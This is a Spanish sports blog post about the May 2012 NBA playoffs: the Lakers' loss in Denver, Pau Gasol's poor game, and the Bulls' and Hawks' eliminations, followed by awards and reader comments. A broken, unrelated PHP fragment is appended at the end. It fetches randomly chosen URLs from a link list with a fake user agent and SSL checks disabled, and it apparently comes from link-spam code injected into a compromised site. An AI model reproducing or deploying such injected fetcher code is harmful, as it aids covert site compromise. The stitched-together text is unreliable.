La Crónica: Entre gastroenteritis y cagaleras

11 de May de 2012 por txusma

Un cuestionario rápido para empezar:

– Tipo A: 31 puntos con altos porcentajes de acierto y 4 asistencias.
– Tipo B: Jugador interior, 3 puntos, 3 rebotes en 29 minutos, con una magistral serie de tiro de 1 de 10.
– Tipos C y D: Disponen de 2 tiros libres a vida o muerte. Fallan.

¿Quién de ellos tiene los calzones más llenos de “deposiciones”? ¿Quién de ellos estaba enfermo?

La respuesta a la primera pregunta bien puede ser la B y la respuesta a la segunda sería la A.

Los Lakers hicieron el ridículo en Denver con el peor Pau Gasol de su carrera a la cabeza (96-113). Si el año pasado fue triste para él lo de anoche es una mancha de las que no se limpian nunca. Anotad la fecha de hoy, es el día en el que Christian Eyenga fue más productivo  que Gasol. Tiene especial delito porque Kobe llegaba con una gastroenteritis a un choque importantísimo y aún así ejerció de gran líder porque no hay otro. Porque en este tipo de momentos se demuestra quién vale de verdad y quién no. Es este tipo de momentos los que justifican que ante la duda él se lo guise y él se lo coma. La jerarquía se gana y se defiende noche tras noche, especialmente en las más complicadas.

Decían que el agujero estaba en Fisher, pero anoche el pescador tampoco estaba y Ty Lawson se puso ciego con una serie de 13 de 18. Agujero sigue habiendo, no se puede negar. Al gran maestro defensivo Mike Brown le cayeton 113 puntos pero podían haberle caído 130 o 140. ¿Tenías teórico dominio interior? Pues a jugar a 180 posesiones. La batalla la gana Karl.

Pero no hemos hablado de los tipos C y D del principio. Los Bulls tenían el partido casi ganado en Philadelphia para jugar el séptimo y definitivo en el United. Otro espectáculo horrible, pero iban 3 arriba a falta de 25 segundos imponiendo su defensa. A 7 segundos para el final Omer Asik tiene dos tiros libres con uno arriba. Los falla los dos, como es natural en su caso. El rebote del segundo lo coge Andre Iguodala que sale como una flecha hacia la canasta rival y aunque no anota le saca la falta al mismo Asik. A Iguodala no le tiembla el pulso y convierte los 2 tiros libres (78-79). Los Bulls son los 5ºs campeones de regular que caen en primera ronda de la historia.

En la otra serie la historia se repite, pero en este caso, si cabe más cruel. Tras un tapón crucial de Paul Pierce a bandeja de Joe Johnson, lanzaba tiros libres Al Horford para empatar en el TDK Garden a falta dos segundos del final. El dominicano había sido vital para aguantar a los Celtics. Fallaba el primero y el partido se les iba (80-83). Efectos del duende verde, suponemos. Inmensa actuación de Garnett, como en las mejores tardes. Las comparaciones son odiosas, nuevamente con Gasol.

PREMIOS

MVP: Picado en su amor propio por las críticas del propietario de los Hawks, Kevin Garnett sacó todo lo que lleva dentro. 28 puntos, 14 rebotes, 3 robos, 5 tapones y la canasta clave que dio la victoria a los Celtics.  Ty Lawson no se quedó muy atrás con sus 32 puntos, 5 rebotes y 6 asistencias. Dominó cuanto y cuando quiso a los Lakers.

Rookie: Kenneth Faried se comió a Pau Gasol de principio a fin con sus 15 puntos, 11 rebotes y 2 tapones.

Sorpresa: Marvin Williams ha jugado más en estos 2 últimos partidos de la serie y los Hawks lo han notado positivamente. Ayer anotó 16 puntos y cogió 8 rebotes.

Decepción: No hay excusas, no hay explicaciones que valgan. Ni el MARCA puede justificar la terrible actuación de Pau Gasol. 1 de 10 en tiros de campo, 3 puntos, 3 rebotes, 1 asistencia y una actitud impropia de alguien que está disputando un partido deciviso de playoffs.

Esfuerzo en vano: Aún enfermo de grastroenteritis (según él mismo su habitación parecía la de la niña del exorcista) Kobe Bryant fue el mejor de los Lakers con 31 puntos. Se le podrán criticar cosas pero nunca, nunca se esconde. Luol Deng volvió a dar el do de pecho y sus 19 puntos y 17 rebotes casi dan la victoria a los Bulls.

Imágenes | AP Photos / Getty Images

Comenta

58 comentarios a esta entrada

  1. Nacho dice:
    #1

    ¡Coñe! Ha sido hablar y 11-1 y de parcial los Nuggets

      Citar

  2. Nacho dice:
    #2

    Final del tercer cuarto, y a 1 Denver.
    malas, muy malas decisiones de ataque, y caraja atrás, aparte del típico arreón de Denver, con Al Harrington y sobre todo Ty Lawson (¡Menos mal que no está Fisher!)

      Citar

  3. Nacho dice:
    #3

    23-17-6 y 4 chapas. Nada más que decir.
    ¡Ah sí, ganaron LA!
    Y ojito a MWP y Blake.
    A dormir

      Citar

  4. Txusma dice:
    #4

    Así sí, Pau!! Leches, q contento me he puesto cuando he visto el resultado y su actuación.

    Hoy la crónica se retrasará un poco, q necesitamos dormir 😉

      Citar

  5. Txusma dice:
    #5

    Ahora q de loes 17 rebotes del Pau 7 son en la misma jugada 😀

      Citar

  6. Jose Luis dice:
    #6

    A mi me da que los que se lo tienen que hacer mirar son los Celtics… ganar sólo de 1 a Sixers en tu campo… y he visto el resumen de NB.com, y hay muchos contraataques, la mitad acaban en puntos y la mitad no, y con el Heat van a acabar dentro todas sí o sí… no sé si ha sido un mal partido de Celtics o qué, pero ya con los Hawks no me parecieron muy superiores… 4-1 para Miami si es que llegan ambos, claro.

      Citar

  7. nba dice:
    #7

    Txusma:
    Ahora q de loes 17 rebotes del Pau 7 son en la misma jugada

    Sip, pero lo importante es que al final metio la canasta, que otras veces ni eso.
    Habra que ver si la prolongacion innecesaria de esta seria causa un 4-0 de OKc , o por el contrario seran capaces de que acabe en 4-2

      Citar

  8. Nacho dice:
    #8

    Txusma:
    Ahora q de loes 17 rebotes del Pau 7 son en la misma jugada

    Realmente son en dos jugadas, una cuatro, y otra tres. Claro que también subiría su acierto de cara al aro. Iba a comentar algo del partido esta mañana, más relajado, porque sigo dormido, ¡leches! y me despierto a leeros. Sois una droga, jaja. Luego cuento el partidito, lo que yo vi.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>